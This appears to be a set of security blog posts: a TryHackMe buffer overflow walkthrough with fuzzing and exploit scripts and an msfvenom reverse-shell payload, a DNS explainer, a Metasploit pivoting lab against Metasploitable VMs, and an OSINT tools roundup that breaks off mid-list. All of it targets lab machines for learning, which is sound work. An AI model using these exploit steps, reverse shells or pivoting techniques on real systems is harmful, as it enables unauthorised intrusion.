Configuring Mona On Immunity Debugger

After immunity has been configured, you can open the oscp.exe program which is found in the vulnerable program’s directory. You can then run the program by clicking the red arrow. Feel free to poke around on the program by connecting to it using netcat on port 1337.

Fuzzing The Program

We need to fuzz the program to see if it is vulnerable. We do this by sending it a long string of characters. In essence, This long string of characters will eventually exceed the memory buffer causing the buffer overflow. That drastically simplifies the process but let’s start fuzzing the program. Grab the script below and amend it with the IP address of the host and the overflow you want to target.

#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.237.191"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

Ensure the program is running then launch the fuzzing script. Additionally, make a note of the number of bytes it takes to crash the program.

"python3 fuzz.py"
Buffer Overflow Fuzzing
Buffer Overflow Fuzzing

Create a Cyclic Pattern

Finding the EIP offset requires us to create a pattern with the length that was required to crash the program. For example, we can use Metasploit to create a Cyclic Pattern by using the command below. However, an additional 400 bytes should be added to the pattern. As it took 2400 bytes to crash the program we will create a pattern of 2400.

   /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400     
Metasploit Creating Cyclic Pattern
Metasploit Creating Cyclic Pattern

Next, you need to edit the python payload below and add the Cyclic Pattern to the payload variable. Please be advised that I have snipped some out to save space so the below payload won’t work. Generate and use your own.

import socket

ip = "MACHINE_IP"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = <sniped>"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4A"<sniped>
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Finding The EIP Offset

Next, we need to find the EIP offset. By all means, go and research what the EIP offset is used for, I’m not going to explain a lot in detail here as the post will be long enough. Anyway, restart and reopen the vulnerable OSCP program and then launch your python exploit script.

python3 exp.py

Once the Python exploit has crashed the script, head over to the immunity debugger and run the following Mona command to find the EIP offset.

!mona findmsp -distance 2000

This should open the Log window but if it doesn’t then open it manually and look for the following entry in the output.

EIP contains normal pattern : ... (offset 1978)

Creating a Byte Array

For Buffer Overflows to be successful we need to ensure that our payloads don’t contain any bad characters. To explain, bad characters such as null bytes (\x00) could cause our payload to crash the program rather than executing the code we specify.

First, we need to modify our exploit script and set the ‘retn’ variable to ‘BBBB’. Next, we need to set the offset variable to the EIP offset value we discovered earlier (1978). Then we need to use Mona to create a Byte Array to compare our payload to. This Byte Array will exclude all the bad characters we find starting with the Null Byte.

!mona bytearray -b "\x00"

In order for us to identify the bad characters, we need to create our own byte array to use as a payload. This can be done using the script below. Copy and save the script to a name of your choice, I chose bad.py. Copy the output of the script and paste it into the payload variable of the exploit script.

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()
Creating a Byte Array
Creating a Byte Array
Adding Byte Array To Buffer Overflows Exploit Script
Adding Byte Array To Buffer Overflows Exploit Script

Finding Bad Characters

Back to finding bad characters, reopen and run the vulnerable OSCP.exe application. Then run your Python buffer overflows exploit script.

Buffer Overflows Python Script
Buffer Overflows Python Script

Once the script has been completed, head back to the Immunity Debugger and loo for the ESP register in the CPU window.

ESP Address in Immunity Debugger
ESP Address in Immunity Debugger

Right click the ESP register and copy the address to your clip then run the following Mona command to compare it to the Byte Array that Mono created earlier. As shown below, this produces a window containing all the bad characters that we need to eliminate from our script. However, some of these characters may not be bad characters. For example \x07 and \x08 are both listed as bad characters but it could be that \x07 is bleeding into \x08 and making it look bad. Therefore, we need to repeat the process we just did and eliminate each bad character one at a time.

  !mona compare -f C:\mona\oscp\bytearray.bin -a 01AFFA30
Buffer Overflows Bad Characters
Buffer Overflows Bad Characters

Reapting The Process

I won’t walk you through each step individually but I will include some code below which should help you to repeat the steps we just did.

Create Byte Array
!mona bytearray -b "\x00"
Remove byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 018BFA30

!mona bytearray -b "\x00\x07"
remove \x07 byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 019AFA30

!mona bytearray -b "\x00\x07\x2e"
remove \x2e byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 019AFA30

Keep repeating the process until there are no more bad characters and your comparison results look like the image below.

Immunity Debugger Bad Character Comparison
Immunity Debugger Bad Character Comparison

Finding The Jump Point

Now that we have identified all the bad characters, we can use Mona to find a Jump point in the application that excludes all these bad characters. Again, I don’t have a clue what I’m talking about, I’m just following a process and rewriting it. As you can see from the command below, we are asking Monda to find a jump point excluding all the bad characters we have eliminated.

 !mona jmp -r esp -cpb "\x00\x07\x2e\xa0"
Buffer Overflows Jump Point
Buffer Overflows Jump Point

Creating The Buffer Overflow Exploit

We now need to create our payload. As can be seen from the snippet and image below, we can use msfvenom to create it for us. Ensure you select the correct payload, change your LHOST address, and include the bad characters. We include the bad characters to ensure that the payload doesn’t contain any.

msfvenom -p windows/shell_reverse_tcp LHOST=10.18.127.129 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

   

Msfvenom Buffer Overflows Payload
Msfvenom Buffer Overflows Payload

Next, we need to modify our Python exploit script to add the payload and return address (the JMP address we just found). Ensure that the payload starts with an open bracket and double speech mark, and closes with a double speech mark and close bracket. When adding the return address, you need to reverse the JMP address. See the image below for details. The original JMP address is in blue as a comment. You can see that 625011af becomes \xaf\x11\x50\x62. You also need to add the padding as shown below (padding = “\x90” * 16).

Buffer Overflows Exploit
Buffer Overflows Exploit

Exploiting The Buffer Overflow

First, reopen the oscp.exe vulnerable program and run it. Next, create a net cat listener on your attack host.

┌─[✗]─[joe@Parrot]─[~/OF]
└──╼ $sudo nc -lvnp 4444
listening on [any] 4444 ...
NetCat Listener
NetCat Listener

Finally…. RUN… THE… EXPLOIT…

Buffer Overflow Complete
Buffer Overflow Complete

Conclusions

Going through the Buffer Overflow series on TryHackMe has taught me a lot about failure and success. It has allowed me to reflect on how impatient I can be when things aren’t going my way. I feel that this is such a relevant topic in society today. A lot of things aren’t going our way right now. Ukraine is being invaded by Russia, the cost of living crisis, our clueless leadership and so much more. It’s all incredibly frustrating to sit back and watch. Sometimes I just want to fast forward life until it isn’t so crappy again. However, our failures and setbacks allow us to appreciate the good things in life when they do happen. I was overjoyed when I finally got this exploit to work. Granted it is insignificant to the problems in the world but perhaps something better is just on the horizon.

Domain Name System Simplified

Hello world, and welcome to HaXeZ. Today I want to talk about the Domain Name System (DNS). I know, I know, most of you probably already know how DNS works. However, I’m going to be writing an article soon about Firewall Evasion and Data Exfiltration through DNS Tunnelling and I needed to brush up on my DNS knowledge. Never wanting to waste an opportunity, I thought it would make for a good blog post and video so here we are.

What Is The Domain Name System?

Domain Name System or DNS is a hierarchical system for translating text to IP addresses. It relies on various nameservers at various levels. A nameserver is a server that holds records for domains whether they are top-level domains (TLD) or fully qualified domains (FQDN). At the very top of the hierarchy are the root servers. These root servers hold the DNS record information for the top-level domains. This information is stored in something called a zone file. You can perform a DNS zone transfer using many tools, the example below uses Nmap.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja
DNS Zone File
DNS Zone File

The zone file contains entries such as the nameservers for the top-level domains. Underneath the root nameservers are the top-level domain nameservers. The same principle applies here in that the top-level domain nameservers contain information about the fully qualified domain nameservers. At the bottom of the hierarchy is the domain’s authoritative nameservers which contain records such as A, MX, NS, TXT, and many others.

What Is The Domain Name System?
What Is The Domain Name System?

Domain Structure

If we look at the web address haxez.org we can see that it has multiple sections. You may not know about the first section as it doesn’t tend to be represented by anything. In some cases, it can be represented by a full stop but most Domain Name System nameservers don’t require the full stop in order for it to work. The full stop comes at the end of the ‘.ORG’ section and signifies a root nameserver. Root nameservers hold the IP addresses of the top-level domain (TLD) (COM, NET, ORG,) nameservers. The ‘ORG’ section of the address is a top-level domain. The ‘haxez’ portion of the address is the domain. Anything that comes before haxez.org would be a subdomain. For example, www.haxez.org where www is the subdomain, and haxez is the fully qualified domain.

Domain Name System Domain Structure
Domain Name System Domain Structure

How Does The Domain Name System Work?

When you type a URL into your browser a number of things happen. Using various online resources I’ve broken it down into 10 steps. I’ve overly simplified the process but there is a lot more going on such as caching, virtual host magic, TCP handshakes, and GET requests.

  1. The client queries the DNS resolver for the location of the domain name,
  2. The DNS resolver queries a root nameserver for the location of the top-level domain (.COM, .ORG, .CO.UK, .NET) nameserver,
  3. The root nameserver responds to the DNS resolver with the IP address of the top level domain nameserver,
  4. The DNS resolver then queries the top level domain nameserver for the location of the domain’s authoritative nameserver,
  5. The top-level domain nameserver tells the DNS resolver the IP address of the authoritative nameserver.
  6. The DNS Resolver then queries the authoritative nameserver for the IP address of the domain.
  7. The authoritative nameserver tells the DNS resolver the IP address of the domain,
  8. The DNS resolver responds back to the client with the IP address of the domain,
  9. The client then sends the request to the target IP address,
  10. The target IP address would then respond with the information the client requested.
Domain Name System Process
Domain Name System Process

DNS Demonstration

Let’s start at the top! using the tool nslookup we can query the root nameservers. We simply set the type of query to the nameserver and then use a full stop to specify the root servers. As you can see from the output below, nslookup returns all the root server nameservers.

┌─[joe@Parrot]─[~]
└──╼ $nslookup
> set type=ns
> .
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
.	nameserver = c.root-servers.net.
.	nameserver = d.root-servers.net.
.	nameserver = e.root-servers.net.
.	nameserver = f.root-servers.net.
.	nameserver = g.root-servers.net.
.	nameserver = h.root-servers.net.
.	nameserver = i.root-servers.net.
.	nameserver = j.root-servers.net.
.	nameserver = k.root-servers.net.
.	nameserver = l.root-servers.net.
.	nameserver = m.root-servers.net.
.	nameserver = a.root-servers.net.
.	nameserver = b.root-servers.net.
Authoritative answers can be found from:

In order to query the root server nameservers, we need to find out what their IP addresses are. In order to do that we set the query type to an A record. An A record translates a word to an IP address.

> set type=a
> a.root-servers.net
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
Name:	a.root-servers.net
Address: 198.41.0.4

Next, we need to find the nameservers of the top-level domain. In order to do that, we first set our server to the IP address that we just obtained from our A record query. Next, we set the record type to the nameserver and then query the “.COM” top-level domain. However, ensure you put a full stop after it.

> server 198.41.0.4
Default server: 198.41.0.4
Address: 198.41.0.4#53
> set type=ns
> com.
;; Truncated, retrying in TCP mode.
Server:		198.41.0.4
Address:	198.41.0.4#53
Non-authoritative answer:
*** Can't find com.: No answer
Authoritative answers can be found from:
com	nameserver = e.gtld-servers.net.
com	nameserver = b.gtld-servers.net.
com	nameserver = j.gtld-servers.net.
com	nameserver = m.gtld-servers.net.
com	nameserver = i.gtld-servers.net.
com	nameserver = f.gtld-servers.net.
com	nameserver = a.gtld-servers.net.
com	nameserver = g.gtld-servers.net.
com	nameserver = h.gtld-servers.net.
com	nameserver = l.gtld-servers.net.
com	nameserver = k.gtld-servers.net.
com	nameserver = c.gtld-servers.net.
com	nameserver = d.gtld-servers.net.
e.gtld-servers.net	internet address = 192.12.94.30
e.gtld-servers.net	has AAAA address 2001:502:1ca1::30
b.gtld-servers.net	internet address = 192.33.14.30
b.gtld-servers.net	has AAAA address 2001:503:231d::2:30
j.gtld-servers.net	internet address = 192.48.79.30
j.gtld-servers.net	has AAAA address 2001:502:7094::30
m.gtld-servers.net	internet address = 192.55.83.30
m.gtld-servers.net	has AAAA address 2001:501:b1f9::30
i.gtld-servers.net	internet address = 192.43.172.30
i.gtld-servers.net	has AAAA address 2001:503:39c1::30
f.gtld-servers.net	internet address = 192.35.51.30
f.gtld-servers.net	has AAAA address 2001:503:d414::30
a.gtld-servers.net	internet address = 192.5.6.30
a.gtld-servers.net	has AAAA address 2001:503:a83e::2:30
g.gtld-servers.net	internet address = 192.42.93.30
g.gtld-servers.net	has AAAA address 2001:503:eea3::30
h.gtld-servers.net	internet address = 192.54.112.30
h.gtld-servers.net	has AAAA address 2001:502:8cc::30
l.gtld-servers.net	internet address = 192.41.162.30
l.gtld-servers.net	has AAAA address 2001:500:d937::30
k.gtld-servers.net	internet address = 192.52.178.30
k.gtld-servers.net	has AAAA address 2001:503:d2d::30
c.gtld-servers.net	internet address = 192.26.92.30
c.gtld-servers.net	has AAAA address 2001:503:83eb::30
d.gtld-servers.net	internet address = 192.31.80.30
d.gtld-servers.net	has AAAA address 2001:500:856e::30

We get a lot of results but we should be able to set any of these to our DNS resolver in order to query it for a specific domain nameserver. Set the server to one of the IP addresses listed above and then set the type to nameserver again. Then, choose a domain and punch It in to find its nameservers.

> server 192.5.6.30
Default server: 192.5.6.30
Address: 192.5.6.30#53
> set type=ns
> google.com.
Server:		192.5.6.30
Address:	192.5.6.30#53
Non-authoritative answer:
*** Can't find google.com.: No answer
Authoritative answers can be found from:
google.com	nameserver = ns2.google.com.
google.com	nameserver = ns1.google.com.
google.com	nameserver = ns3.google.com.
google.com	nameserver = ns4.google.com.
ns2.google.com	has AAAA address 2001:4860:4802:34::a
ns2.google.com	internet address = 216.239.34.10
ns1.google.com	has AAAA address 2001:4860:4802:32::a
ns1.google.com	internet address = 216.239.32.10
ns3.google.com	has AAAA address 2001:4860:4802:36::a
ns3.google.com	internet address = 216.239.36.10
ns4.google.com	has AAAA address 2001:4860:4802:38::a
ns4.google.com	internet address = 216.239.38.10

Finally, we can now set our DNS resolver to one of googles nameservers and query it to find A records such as mail. This could of course be scripted to automatically run through each of these steps automatically and perform a subdomain brute force attack against the servers. I believe there is already a tool called Fierce that does exactly that.

> server 216.239.32.10
Default server: 216.239.32.10
Address: 216.239.32.10#53
> set type=a
> mail.google.com.
Server:		216.239.32.10
Address:	216.239.32.10#53
Name:	mail.google.com
Address: 142.250.178.5

Conclusion

I know this isn’t hacking but it’s essential to have a good understanding of the technologies that make the internet and the world wide web possible. There is a lot more to DNS than I’ve covered here. I haven’t discussed the various record types like MX, TXT, and CNAME that can be added to a zone file. I haven’t talked about propagation and caching.

DNS is such as fascinating subject to study because the problem is always DNS. Joking aside, without DNS we would have to remember the IP addresses of every website we wanted to visit. Oh, and those root servers at the top of the tree, if they go down then so does the internet. No more name resolution means anything that has been developed with resources being pulled via domain names will no longer work. It’s a terrifying prospect, especially with all the recent talk of cyber armageddon from the World Economic Forum. If someone with a zero-day were to get into those root servers and mess up the zone files then it would cause chaos. Hopefully, there is some hidden redundancy and backups to mitigate that possibility. Those 13 nameservers are the unsung heroes of the internet and to them I say, thank you. Keep computing away you absolute legends.

Metasploit Pivoting To Hack Segregated VirtualBox Virtual Machines

Dear friend, welcome to HaXeZ. If you’re new to hacking and cybersecurity then you may have heard about pivoting. If you haven’t then let me explain. Pivoting is where you have compromised a host and discovered it is attached to another network. You then use that host to pivot your scans and attacks to hosts within that other network. For example, imagine you have just compromised a public-facing Web Application server. You check the network configuration and find that it is connected to an internal network. You can then use the compromised web application server to scan that internal network.

Pivoting
Pivoting

Pivoting Labs

I have seen some labs that allow you to practice pivoting but frankly not that many. Some require a complex setup process and others require paying a setup fee in order to access them. Then I had a light bulb moment. I’ve googled around and I haven’t seen many articles relating to using VirtualBox. VirtualBox has a number of network adaptor settings. One of these settings is a Host Only adapter. You can have multiple Virtual Machines configured to use this host-only adapter. You can also create multiple host-only adapters. My idea (I’m sure many others have had it) was to set up a lab in the following configuration.

  • Kali VM on the host only adapter 1.
  • Vulnerable VM 1 on the host only adapters 1 and 2.
  • Vulnerable VM 2 on the host only adapter 2.

The Kali VM wouldn’t be able to reach Vulnerable VM 2 unless it has exploited and is pivoting through Vulnerable VM 1.

Lab Set Up

Let’s get to work, first I downloaded Metasploitable 2. I created a new virtual machine and called it Meta1. I then cloned that virtual machine and called it Meta2.

Pivoting - Clone Virtual Machine
Pivoting – Clone Virtual Machine

Next, I used the host network manager to create a new host-only adapter.

Pivoting - Creating New Host-Only Adapter
Pivoting – Creating New Host-Only Adapter

After that, I configured the first network adapter on Meta1 to the first host-only adapter. Then I enabled and configured the second network adapter on Meta1 to the second host-only adapter. Finally, I configured the first network adapter on Meta2 to the second host-only adapter. I also made sure that my Kali Linux VM had its network set to the first host-only adapter.

Host Network Configuration
Host Network Configuration

Host Configuration

I booted Meta1 and logged in (msfadmin|msfadmin) and noticed that it only had one interface up (eth0). In its current condition, it won’t be able to talk to the second network and thus the second target. To rectify this, I had a quick google search and found this page in the Ubuntu documentation. The configuring interface section explains how to bring up an interface using DHCP.

sudo ip link set dev eth1 down
sudo dhclient eth1
Interface eth1 Configured

Testing Pivoting

Now for the moment of truth, does this allow me to pivot from Meta1 to Meta2. First, we need to find the IP address of the host on the same network as us. You can do this by running ifconfig on the host or the proper way by performing a Nmap scan. Great, our host is online and has the IP address 192.168.56.106.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 13:51 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:DE:8C:96 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.106
Host is up (0.00025s latency).
MAC Address: 08:00:27:82:70:32 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Next, I needed a way to establish a connection to the host which would allow quick and easy set up of a pivot. Let’s launch Metasploit.

Metasploit

For simplicity, I chose the ssh_login module and configured it with the remote host’s IP address and the username and password.

msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        
   BRUTEFORCE_SPEED  5                yes       
   DB_ALL_CREDS      false            no        
   DB_ALL_PASS       false            no        
   DB_ALL_USERS      false            no        
   DB_SKIP_EXISTING  none             no        
   PASSWORD          msfadmin         no        
   PASS_FILE                          no        
   RHOSTS            192.168.56.106   yes       
   RPORT             22               yes       
   STOP_ON_SUCCESS   false            yes       
   THREADS           1                yes       
   USERNAME          msfadmin         no       
   USERPASS_FILE                      no        
   USER_AS_PASS      false            no        
   USER_FILE                          no        
   VERBOSE           false            yes       

I then ran the exploit command and waited for it to complete. Great, we have established a connection to our host but now we need to upgrade it to a Meterpreter shell. In order to do this, I first figured out what session it was using the session command.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         shell linux  SSH root @   192.168.56.102:44505 -> 192.168.56.106:22 (192.168.56.106)
  3         shell linux  SSH root @   192.168.56.102:41553 -> 192.168.56.106:22 (192.168.56.106)

Next, I instructed Metasploit to upgrade the session to a Meterpreter session.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.102:4433 
[*] Sending stage (989032 bytes) to 192.168.56.106
[*] Command stager progress: 100.00% (773/773 bytes)

Creating The Pivot

To create the pivot, I jumped into the newly created Meterpreter session and ran the ifconfig command to see what available networks there were.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::

Interface  2
============
Name         : eth0
Hardware MAC : 08:00:27:82:70:32
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.106
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe82:7032
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface  3
============
Name         : eth1
Hardware MAC : 08:00:27:41:4f:ce
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.242.3
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe41:4fce
IPv6 Netmask : ffff:ffff:ffff:ffff::

Next, I sent the session to the background, selected the autoroute module, and configured it to use session 4.

msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       
   NETMASK  255.255.255.0    no       
   SESSION  4                yes       
   SUBNET                    no        

I then ran the module and it create the pivot for me.

Finding Hosts Through Pivoting

I then needed to find the target host. Of course, I could have run ifconfig on it but where is the fun in that. I switched to the ping_sweep module and configured it to use session 4. I then configured the IP address of the remote network and ran the module.

msf6 post(multi/gather/ping_sweep) > options
Module options (post/multi/gather/ping_sweep):
   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   RHOSTS   192.168.242.0/24  yes       
   SESSION  4                 yes       
msf6 post(multi/gather/ping_sweep) > run
[*] Performing ping sweep for IP range 192.168.242.0/24
[+]     192.168.242.3 host found
[+]     192.168.242.2 host found
[+]     192.168.242.4 host found

Scanning Ports Through Pivoting

Sure enough, our host was there. Don’t ask me what the other ones are, I honestly don’t know and at this point, I’m too afraid to ask. Our target IP address was 192.168.242.4. So what’s next? service discovery obviously. I selected the portscan/tcp module and configured it to target the host. I ran the module and sure enough it found all the open ports on the host.

msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       
   DELAY        0                yes       
   JITTER       0                yes       
   PORTS        1-10000          yes       
   RHOSTS       192.168.242.4    yes       
   THREADS      1                yes       
   TIMEOUT      1000             yes       

msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.242.4:        - 192.168.242.4:25 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:23 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:21 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:22 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:53 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:80 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:111 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:139 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:445 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:512 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:513 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:514 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:1099 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:1524 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:2049 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:2121 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:3306 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:3632 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:5432 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:5900 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6000 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6667 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6697 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8009 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8180 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8787 - TCP OPEN
[*] 192.168.242.4:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Just to be on the safe side I tried to ping the host from my Kali VM to ensure I hadn’t messed something up. Sure enough, the network was unreachable.

┌──(kali㉿kali)-[~]
└─$ ping 192.168.242.4
ping: connect: Network is unreachable

Conclusion

So that’s what I’ve been doing today. I had this idea late last night when trying to get to sleep. It actually kept me awake for a while until I got up and wrote it down. This happens to me a lot but I do occasionally have some good ideas. Anyway, I really enjoyed this as I haven’t had much opportunity to experiment with pivoting. I’m actually shocked that I didn’t think of doing this sooner as it’s such an obvious method of practicing it. It was fun setting up, other than having a few errors with Metasploit due to some scripts being broken. Anyway, that’s me done for the day. I will record a video on this soon and upload it to the tube but until then.

Kind Regards

Hack To Learn: OSINT and Passive Reconnaissance

Dear Friend, welcome to HaXeZ where I want to talk about Open-source intelligence and passive reconnaissance. Passive Reconnaissance is one of the most important phases for successful hacking. Passive Reconnaissance uses Open Source Intelligence (OSINT) techniques to gather information about the target. To explain, we attempt to gather information about the target without interacting with it. For this reason, this article is going to cover a number of Passive Reconnaissance tools but there are plenty more out there.

Google Passive Reconnaissance

Google is an extremely powerful search engine. They didn’t become the number one search engine by luck. Usually, most people use google by popping in word and looking through the results. However, with a few modifications to your search terms, Google can be a powerful Passive Reconnaissance tool. In essence, using specific search operators can retrieve a wealth of information from google. Additionally, the Exploit Database has a whole section dedicated to “Google Dorks” which can return potentially sensitive information about a target. Below are just a few examples.

Google Passive Reconnaissance
Google

Maltego Passive Reconnaissance

Maltego is an open-source intelligence gathering application that allows you to gather information about a target domain. In short, it has a number of transforms that will automatically perform passive reconnaissance techniques. Furthermore, these transforms include various DNS record look-ups from various sources. Email addresses and telephone numbers and various other bits of information. Overall, the interface provides an intuitive and friendly method of viewing the information retrieved. Within a few clicks, you can have a wealth of information that could allow you to find weaknesses in your target. Simply right an entity and chose from the list of transforms.

https://www.maltego.com/

Maltego Passive Reconnaissance
Maltego

Have I Been Pwned?

Have I been Pwned? is a web application that allows you to check whether the credentials of a mailbox have been compromised. Notably, It utilizes known database leaks and checks whether your email address was part of those leaks. These leaks are from various sources including public leaks such as the Linked In database leak. Have I Been Pwned? was created for you to check your own email address but there is nothing stopping you from checking other peoples too.

https://haveibeenpwned.com/

Have I Been Pwned Passive Reconnaissance
Have I Been Pwned

MXToolbox Passive Reconnaissance

MXToolBox is a web application that has a great number of tools. I initially discovered this tool while working in Technical Support for a hosting provider. It can be used to gather information about a domain’s DNS records. Furthermore, it has tools like ping so if you want to see whether an IP is blocking you, you can check on here rather than switching VPN locations. To cover all the tools would require an entire article but this is a great tool to perform passive reconnaissance against a target.

https://mxtoolbox.com/

Mx Toolbox
Mx Toolbox

Shodan Passive Reconnaissance

Shodan is a search engine for internet-connected devices. It can be used to find specific devices with specific operating systems with specific ports open. It has also indexed the various banners that those ports display when connecting to them. Furthermore, it also checks to see whether those devices are using weak credentials. You can filter devices by country, city, organization, and domain, the list of flags is endless. If you wanted to find all FTP servers owned by a certain organization that supports anonymous login then you can.

https://www.shodan.io/

Shodan
Shodan

OSINT Framework

The OSINT Framework is a web application that catalogs everything you could want to know about Open Source Intelligence Gathering. It has a horizontal hierarchical structure and clicking one category will provide other categories and eventually a link to a resource. The resource will usually provide instructions or a tool for you to perform that specific type of OSINT. This web application has a lot to explore, more than can be covered in a single article.

https://osintframework.com/

OSINT Framework

Whois

The Whois is a tool that can gather information about the registration of a domain. In some cases, it may tell you who registered it and include their contact details but this will depend on the domain privacy settings. This information could include the domain owners’ telephone number as well as their addresses. Furthermore, the owner information, domain registration date, and expiry date can also be provided by the tool.

whois google.com
Whois
Whois

NSlookup

You can use the nslookup tool to retrieve information about a domain. The information can include the domains name servers, the IP address, the mail servers, and various other records. It can tell you how the domain is configured, provide certain records, and may identify potential targets.

nslookup
nslookup

theHarvester

